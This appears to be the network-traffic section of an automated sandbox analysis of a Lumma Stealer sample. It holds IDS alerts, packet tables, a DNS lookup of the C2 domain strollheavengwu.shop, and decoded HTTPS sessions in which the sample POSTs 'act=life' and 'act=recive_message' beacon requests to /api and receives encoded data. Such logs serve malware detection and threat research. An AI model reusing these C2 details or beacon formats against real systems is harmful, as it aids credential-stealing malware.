04/25/24-01:59:52.426039 | UDP | 2052229 | ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (strollheavengwu .shop) | 56700 | 53 | 192.168.2.4 | 1.1.1.1
04/25/24-01:59:52.576860 | TCP | 2052230 | ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) | 49730 | 443 | 192.168.2.4 | 172.67.163.209
04/25/24-01:59:56.147948 | TCP | 2052230 | ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) | 49734 | 443 | 192.168.2.4 | 172.67.163.209
04/25/24-01:59:57.117668 | TCP | 2052230 | ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) | 49735 | 443 | 192.168.2.4 | 172.67.163.209
04/25/24-01:59:53.349065 | TCP | 2052230 | ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) | 49731 | 443 | 192.168.2.4 | 172.67.163.209
04/25/24-01:59:59.483318 | TCP | 2052230 | ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) | 49737 | 443 | 192.168.2.4 | 172.67.163.209
04/25/24-01:59:54.263019 | TCP | 2052230 | ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) | 49732 | 443 | 192.168.2.4 | 172.67.163.209
04/25/24-01:59:58.166541 | TCP | 2052230 | ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) | 49736 | 443 | 192.168.2.4 | 172.67.163.209
04/25/24-01:59:55.123309 | TCP | 2052230 | ET TROJAN Observed Lumma Stealer Related Domain (strollheavengwu .shop in TLS SNI) | 49733 | 443 | 192.168.2.4 | 172.67.163.209
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 25, 2024 01:59:52.572989941 CEST | 49730 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:52.573046923 CEST | 443 | 49730 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:52.573153973 CEST | 49730 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:52.576859951 CEST | 49730 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:52.576878071 CEST | 443 | 49730 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:52.816279888 CEST | 443 | 49730 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:52.816553116 CEST | 49730 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:52.819520950 CEST | 49730 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:52.819533110 CEST | 443 | 49730 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:52.819885015 CEST | 443 | 49730 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:52.860140085 CEST | 49730 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:52.900993109 CEST | 49730 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:52.901043892 CEST | 49730 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:52.901201963 CEST | 443 | 49730 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:53.340559959 CEST | 443 | 49730 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:53.340780973 CEST | 443 | 49730 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:53.340861082 CEST | 49730 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:53.343178034 CEST | 49730 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:53.343203068 CEST | 443 | 49730 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:53.348597050 CEST | 49731 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:53.348692894 CEST | 443 | 49731 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:53.348786116 CEST | 49731 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:53.349065065 CEST | 49731 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:53.349100113 CEST | 443 | 49731 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:53.581455946 CEST | 443 | 49731 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:53.581588030 CEST | 49731 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:53.652034044 CEST | 49731 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:53.652128935 CEST | 443 | 49731 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:53.652484894 CEST | 443 | 49731 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:53.653745890 CEST | 49731 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:53.653791904 CEST | 49731 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:53.653857946 CEST | 443 | 49731 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:54.118079901 CEST | 443 | 49731 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:54.118146896 CEST | 443 | 49731 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:54.118191957 CEST | 443 | 49731 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:54.118232012 CEST | 443 | 49731 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:54.118246078 CEST | 49731 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:54.118282080 CEST | 443 | 49731 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:54.118299961 CEST | 49731 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:54.118324995 CEST | 443 | 49731 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:54.118361950 CEST | 49731 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:54.118369102 CEST | 443 | 49731 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:54.118490934 CEST | 443 | 49731 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:54.118527889 CEST | 49731 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:54.118535042 CEST | 443 | 49731 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:54.118578911 CEST | 443 | 49731 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:54.118613005 CEST | 49731 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:54.118618965 CEST | 443 | 49731 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:54.119164944 CEST | 443 | 49731 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:54.119200945 CEST | 49731 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:54.119208097 CEST | 443 | 49731 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:54.119277954 CEST | 443 | 49731 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:54.119318008 CEST | 49731 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:54.119379044 CEST | 49731 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:54.119395971 CEST | 443 | 49731 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:54.119410038 CEST | 49731 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:54.119415998 CEST | 443 | 49731 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:54.262543917 CEST | 49732 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:54.262598991 CEST | 443 | 49732 | 172.67.163.209 | 192.168.2.4
Apr 25, 2024 01:59:54.262675047 CEST | 49732 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:54.263019085 CEST | 49732 | 443 | 192.168.2.4 | 172.67.163.209
Apr 25, 2024 01:59:54.263034105 CEST | 443 | 49732 | 172.67.163.209 | 192.168.2.4
                                                  Apr 25, 2024 01:59:54.489768982 CEST44349732172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.489856005 CEST49732443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:54.491581917 CEST49732443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:54.491614103 CEST44349732172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.491851091 CEST44349732172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.493168116 CEST49732443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:54.493335009 CEST49732443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:54.493380070 CEST44349732172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:54.493453026 CEST49732443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:54.493467093 CEST44349732172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.020482063 CEST44349732172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.020596027 CEST44349732172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.020656109 CEST49732443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:55.020768881 CEST49732443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:55.020831108 CEST44349732172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.122878075 CEST49733443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:55.122920990 CEST44349733172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.123001099 CEST49733443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:55.123308897 CEST49733443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:55.123318911 CEST44349733172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.350574017 CEST44349733172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.350784063 CEST49733443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:55.352168083 CEST49733443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:55.352176905 CEST44349733172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.352377892 CEST44349733172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.353674889 CEST49733443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:55.353801012 CEST49733443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:55.353827000 CEST44349733172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.865180969 CEST44349733172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.865273952 CEST44349733172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:55.865330935 CEST49733443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:55.865459919 CEST49733443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:55.865473032 CEST44349733172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:56.147443056 CEST49734443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:56.147492886 CEST44349734172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:56.147686005 CEST49734443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:56.147948027 CEST49734443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:56.147969007 CEST44349734172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:56.378156900 CEST44349734172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:56.378254890 CEST49734443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:56.379575014 CEST49734443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:56.379587889 CEST44349734172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:56.379796982 CEST44349734172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:56.381138086 CEST49734443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:56.381289959 CEST49734443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:56.381321907 CEST44349734172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:56.381405115 CEST49734443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:56.381416082 CEST44349734172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:56.948148966 CEST44349734172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:56.948262930 CEST44349734172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:56.948322058 CEST49734443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:56.948460102 CEST49734443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:56.948481083 CEST44349734172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:57.109133959 CEST49735443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:57.109210968 CEST44349735172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:57.109707117 CEST49735443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:57.117667913 CEST49735443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:57.117707968 CEST44349735172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:57.345380068 CEST44349735172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:57.345483065 CEST49735443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:57.346775055 CEST49735443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:57.346807003 CEST44349735172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:57.347023964 CEST44349735172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:57.348160982 CEST49735443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:57.348295927 CEST49735443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:57.348331928 CEST44349735172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:57.869036913 CEST44349735172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:57.869142056 CEST44349735172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:57.869204998 CEST49735443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:57.869374037 CEST49735443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:57.869398117 CEST44349735172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:58.165934086 CEST49736443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:58.166039944 CEST44349736172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:58.166143894 CEST49736443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:58.166541100 CEST49736443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:58.166575909 CEST44349736172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:58.397083044 CEST44349736172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:58.397293091 CEST49736443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:58.398644924 CEST49736443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:58.398674011 CEST44349736172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:58.399130106 CEST44349736172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:58.400417089 CEST49736443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:58.400517941 CEST49736443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:58.400536060 CEST44349736172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:58.892728090 CEST44349736172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:58.892904997 CEST44349736172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:58.892973900 CEST49736443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:58.893078089 CEST49736443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:58.893120050 CEST44349736172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.482790947 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.482896090 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.483002901 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.483318090 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.483355045 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.713880062 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.713987112 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.715706110 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.715739012 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.716116905 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.717437983 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.718386889 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.718436956 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.718548059 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.718597889 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.718733072 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.718777895 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.718936920 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.718971968 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.719155073 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.719192028 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.719382048 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.719422102 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.719446898 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.719562054 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.719609022 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.764120102 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.764328003 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.764409065 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.764435053 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.812119961 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.812279940 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.812331915 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.812360048 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.860115051 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 01:59:59.860294104 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 01:59:59.904160023 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 02:00:00.049961090 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 02:00:01.298826933 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 02:00:01.298960924 CEST44349737172.67.163.209192.168.2.4
                                                  Apr 25, 2024 02:00:01.299026966 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 02:00:01.299232006 CEST49737443192.168.2.4172.67.163.209
                                                  Apr 25, 2024 02:00:01.299252987 CEST44349737172.67.163.209192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 25, 2024 01:59:52.426038980 CEST | 56700 | 53 | 192.168.2.4 | 1.1.1.1
Apr 25, 2024 01:59:52.562253952 CEST | 53 | 56700 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 25, 2024 01:59:52.426038980 CEST | 192.168.2.4 | 1.1.1.1 | 0x27f0 | Standard query (0) | strollheavengwu.shop | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 25, 2024 01:59:52.562253952 CEST | 1.1.1.1 | 192.168.2.4 | 0x27f0 | No error (0) | strollheavengwu.shop | | 172.67.163.209 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 01:59:52.562253952 CEST | 1.1.1.1 | 192.168.2.4 | 0x27f0 | No error (0) | strollheavengwu.shop | | 104.21.15.198 | A (IP address) | IN (0x0001) | false
                                                  • strollheavengwu.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 172.67.163.209 | 443 | 6856 | C:\Users\user\Desktop\o7b91j8vnJ.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-24 23:59:52 UTC | 267 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: strollheavengwu.shop
2024-04-24 23:59:52 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-04-24 23:59:53 UTC | 810 | IN | HTTP/1.1 200 OK
Date: Wed, 24 Apr 2024 23:59:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=buo3uuou9h73r1se2aoe6dl0ks; expires=Sun, 18-Aug-2024 17:46:32 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vKVPEHTJJVHG7lCGGFKCU4%2FJtu0uhD7H36q6omCQAWyWIvZclR9jBj4kUhFQYaqmjjP%2FYmllKh3e2ncn%2Bop4pIY%2F0g89Lt9J5hL9oIea06K3boq0do1AWRtqe0ambZ1iCXg70qQoiA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 879a0cb45ba74582-ATL
alt-svc: h3=":443"; ma=86400
2024-04-24 23:59:53 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-04-24 23:59:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 172.67.163.209 | 443 | 6856 | C:\Users\user\Desktop\o7b91j8vnJ.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-24 23:59:53 UTC | 268 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 58
Host: strollheavengwu.shop
2024-04-24 23:59:53 UTC | 58 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72 73 74 61 72 26 6a 3d 64 65 66 61 75 6c 74
Data Ascii: act=recive_message&ver=4.0&lid=P6Mk0M--superstar&j=default
2024-04-24 23:59:54 UTC | 814 | IN | HTTP/1.1 200 OK
Date: Wed, 24 Apr 2024 23:59:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=lshsshr90hrjrdbobfo8ocqr70; expires=Sun, 18-Aug-2024 17:46:32 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GCubdmKSuSAqMZLIlUvcS7Ctsc8%2F4FwkA5Rfuxxx9SHLMm%2FEDOT39tLFgE1TupjygB80eyhZV%2FSu4tPovnhibcVW6EqXRlpaH3j4nTvRiedjbt%2FKwUG%2FFeJNGgDoq6TM%2F5rycU2Jlg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 879a0cb93a7d53d5-ATL
alt-svc: h3=":443"; ma=86400
2024-04-24 23:59:54 UTC | 555 | IN | Data Raw: 33 61 65 34 0d 0a 59 37 52 62 7a 55 4a 49 49 34 6f 71 67 72 51 35 4f 34 33 55 6f 68 4e 72 66 4e 63 33 71 73 49 51 76 32 37 37 44 49 52 38 57 4d 6f 59 76 6c 4c 76 4e 47 6f 5a 71 68 36 75 76 6a 41 5a 2f 72 47 41 4b 55 73 49 70 55 4c 50 37 68 71 32 54 4a 70 6f 70 6b 5a 34 72 41 4c 59 4b 4b 68 75 51 69 71 6f 52 2f 71 57 41 78 76 57 33 71 74 6f 59 58 58 65 46 63 2b 73 4d 6f 56 4f 32 58 76 68 48 6a 32 79 46 39 45 31 76 69 73 6e 54 63 70 48 35 38 42 59 56 75 79 6e 79 54 30 43 45 2f 55 62 6f 4d 73 5a 6e 51 75 42 4c 72 35 63 65 6f 63 47 77 44 71 41 49 7a 74 49 71 41 61 49 76 54 41 5a 36 4b 43 41 4b 55 74 65 69 78 58 61 6f 32 4c 65 41 34 68 51 70 6b 59 6a 6c 6b 48 64 4c 36 67 77 4b 56 66 6a 52 65 7a 48 5a 52 6d 33 34 70 49 6a 57 30 7a 6e 53 6f 6a 49 47 63 4a 6b 38
Data Ascii: 3ae4Y7RbzUJII4oqgrQ5O43UohNrfNc3qsIQv277DIR8WMoYvlLvNGoZqh6uvjAZ/rGAKUsIpULP7hq2TJpopkZ4rALYKKhuQiqoR/qWAxvW3qtoYXXeFc+sMoVO2XvhHj2yF9E1visnTcpH58BYVuynyT0CE/UboMsZnQuBLr5ceocGwDqAIztIqAaIvTAZ6KCAKUteixXao2LeA4hQpkYjlkHdL6gwKVfjRezHZRm34pIjW0znSojIGcJk8
2024-04-24 23:59:54 UTC | 1369 | IN | Data Raw: 6f 31 31 65 71 38 4e 6c 6d 48 74 59 43 78 50 36 55 58 67 78 46 4e 53 35 4c 50 53 65 67 41 54 75 46 58 46 71 6e 33 65 44 4a 35 6b 37 42 45 77 72 41 7a 62 50 36 38 67 61 67 2b 41 49 34 75 57 58 45 47 76 37 6f 49 78 4b 68 75 6c 55 73 53 32 4d 4f 64 4d 38 51 58 35 55 46 48 71 51 37 35 53 74 6b 68 42 4b 71 68 50 37 4a 59 44 47 36 2b 2b 78 58 49 4b 46 62 70 57 77 4b 74 67 33 52 36 66 59 2b 4d 4d 50 4b 30 50 33 44 71 39 4b 69 52 48 36 30 48 72 33 31 35 65 36 2f 61 4f 47 57 4a 31 39 56 4c 51 34 43 71 66 54 4c 68 6a 37 52 49 77 76 77 47 57 55 63 51 2f 5a 43 6d 44 55 59 69 39 4d 42 6e 6f 75 6f 41 70 53 31 36 78 56 4d 79 68 64 74 4d 43 6e 57 4c 67 45 44 65 6e 42 39 77 35 71 43 6f 69 53 65 6c 46 36 39 6c 62 58 4f 4b 79 78 6e 30 49 47 2f 55 62 6f 4d 73 5a 6e 51 75 42
Data Ascii: o11eq8NlmHtYCxP6UXgxFNS5LPSegATuFXFqn3eDJ5k7BEwrAzbP68gag+AI4uWXEGv7oIxKhulUsS2MOdM8QX5UFHqQ75StkhBKqhP7JYDG6++xXIKFbpWwKtg3R6fY+MMPK0P3Dq9KiRH60Hr315e6/aOGWJ19VLQ4CqfTLhj7RIwvwGWUcQ/ZCmDUYi9MBnouoApS16xVMyhdtMCnWLgEDenB9w5qCoiSelF69lbXOKyxn0IG/UboMsZnQuB
2024-04-24 23:59:54 UTC | 1369 | IN | Data Raw: 4f 74 44 73 51 7a 6f 79 45 34 52 75 46 42 36 74 64 56 56 75 53 36 78 57 4d 43 45 62 31 61 79 61 31 2f 31 67 69 5a 4c 71 68 32 55 63 4e 42 30 53 48 76 65 47 67 42 79 55 58 76 78 46 68 49 72 59 50 44 66 77 63 5a 6f 78 57 67 79 32 32 54 5a 50 4a 33 6a 6e 56 52 36 41 62 61 65 66 64 69 61 6b 44 6b 52 4f 48 5a 58 56 50 6e 74 63 46 6a 41 42 47 39 57 73 47 68 63 64 6b 4e 6b 33 7a 30 48 6a 61 36 44 64 77 2f 6f 43 30 6d 41 61 59 67 69 37 30 62 58 76 66 32 6d 44 4e 4a 4e 4c 5a 42 79 36 6f 77 36 41 2b 58 59 4f 45 49 65 73 42 71 79 58 66 48 53 7a 4d 70 67 79 4f 67 30 56 63 5a 74 2f 53 41 66 41 67 57 73 30 66 48 72 58 48 54 41 70 5a 72 36 52 59 36 71 41 7a 54 50 61 51 72 4b 55 7a 73 57 75 72 57 55 31 7a 75 76 4d 6f 78 52 33 62 65 50 6f 69 6e 61 70 31 55 32 79 37 58 43
